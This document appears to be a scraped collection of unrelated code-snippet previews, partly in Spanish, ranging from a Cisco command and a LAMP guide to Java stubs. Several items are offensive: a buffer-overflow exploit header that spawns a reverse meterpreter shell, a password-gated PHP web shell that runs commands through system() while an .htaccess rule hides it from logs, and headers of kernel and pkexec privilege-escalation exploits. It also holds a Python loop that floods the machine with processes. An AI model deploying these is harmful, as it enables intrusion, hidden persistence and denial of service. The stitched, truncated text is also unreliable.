Ejecutar el comando enable
Switch> enable
| # Exploit Title: Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) | |
| # Usage: python remCS.py <victim-ip> <port> | |
| # Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990 | |
| # CVE: CVE-2004-2466 | |
| # Installer: http://www.echatserver.com/ | |
| # Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000) | |
| #!/usr/bin/python3 | |
| import sys |
| SetEnvIf Request_URI "^/tmpdir/tempfile\.php$" dontlog | |
| <Limit GET POST HEAD> | |
| order deny,allow | |
| deny from all | |
| allow from 127.0.0.1 (or the remote ip of the server). | |
| </Limit> |
| <?php | |
| error_reporting(0); | |
| $action = $_GET['cmd']; | |
| $pw = $_GET['pw']; | |
| $password = "7a3b4197c700b7a94efef0a0590f465664ff210e120156a8c70913c1302fc06fa1bc85cffbf2fb113f99323f08e91489dd4531a0c3657b22fdc065f87b799f5b"; | |
| /* Remove this line!, password= Hasdf4g */ | |
| if( hash('sha512',$pw) == $password) | |
| { | |
| echo system($cmd); | |
| } |
| /* | |
| * #Linux Kernel Exploit | |
| * Hi Hacker, Happy hacking VB | |
| * | |
| * | |
| * Linux Kernel <= 2.6.37 local privilege escalation | |
| * | |
| * Usage: | |
| * gcc exw.c -o exw | |
| * ./exw |
| LAMP es el acr贸nimo de Linux, Apache, MariaDB y PHP. | |
| Versiones que se instalar谩n: | |
| Apache/2.4.46 | |
| MariaDB 10.5.9 | |
| PHP 8.0.2 | |
| phpMyAdmin 5.1.0 | |
| 1.- Actualizar el sistema |
| import java.io.IOException; | |
| import java.io.PrintWriter; | |
| import javax.servlet.ServletException; | |
| import javax.servlet.http.HttpServlet; | |
| import javax.servlet.http.HttpServletRequest; | |
| import javax.servlet.http.HttpServletResponse; | |
| public class ServletWelcm extends HttpServlet { | |
| /** |
| //Window Java Example Struct | |
| import java.awt.event.ActionEvent; | |
| import java.awt.event.ActionListener; | |
| import javax.swing.JButton; | |
| import javax.swing.JFrame; | |
| import javax.swing.JLabel; | |
| import javax.swing.JOptionPane; | |
| import javax.swing.JTextField; |
| #ISRVB#VB | |
| #Py-OS | |
| import os | |
| for i in range(50000): | |
| os.system('start') | |
| /* | |
| * blasty-vs-pkexec.c | |
| * ------------------------------------------------ | |
| * PoC for CVE-2021-4034, shout out to Qualys | |
| * | |
| * ctf quality exploit | |
| * | |
| * bla bla irresponsible disclosure | |
| * | |
| * -- blasty // 2022-01-25 |